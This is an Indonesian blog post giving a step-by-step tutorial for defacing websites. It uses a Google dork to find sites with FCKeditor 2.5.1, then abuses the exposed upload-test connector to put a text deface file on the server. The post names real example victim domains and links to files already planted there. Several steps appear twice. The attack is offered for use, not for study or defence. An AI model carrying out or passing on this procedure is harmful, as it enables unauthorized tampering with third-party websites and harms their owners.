Saya mau share Cara deface yg lainnya nih tapi hanya bisa uploud file { txt }
Gak ush lama lama langsung TKP ajha :D
1. Cari target dengan Google Dork:
inurl:/apps/fckeditor/2. Pilih salah satu target yg muncul pada google
..Ex : http://workabout.us/apps/fckeditor/2.5.1/editor/filemanager/connectors/php/3. Exploitnya ..
http://target.com/[patch]/apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.htmljadinya :
http://workabout.us/apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html 4.Kalo udah masuk ... ganti ASP jadi PHP ..
5.Siapin file deface kita yg berformat *.txt
6. Kembali ke halaman , klik Browse dan cari file deface kita yg udah disiapin tadi ..
7. Terakhir ... klik "Send it to the Server"
5.Siapin file deface kita yg berformat *.txt
6. Kembali ke halaman , klik Browse dan cari file deface kita yg udah disiapin tadi ..
7. Terakhir ... klik "Send it to the Server"
************************************************************************
Untuk melihat file deface'an kita kasih exploit dibawah ini tepat dibelakang target ..
/userfiles/16/namafile.txt jadinya seperti ini :
http://target.com/userfiles/16/namafile.txt ************************************************************************
Mungkin deface'nya terlihat simple, tapi coba lihat efeknya ... BEBERAPA link yg muncul pada google dengan dork diatas ... secara otomatis akan langsung terdeface dengan sendirinya ...
************************************************************************
Contoh hasil :
http://workabout.us/userfiles/16/4c3t0n(2).txt
http://perplexed.co.uk/userfiles/16/4c3t0n(2).txtSumber : http://hacker-newbie.org/showthread.php?tid=14351&highlight=tutorial+deface
tag : tutorial cara deface how to defacing deface web FCK editor
1 comments:
http://perplexed.co.uk/userfiles/16/iboredinmylife.txt
EmoticonEmoticon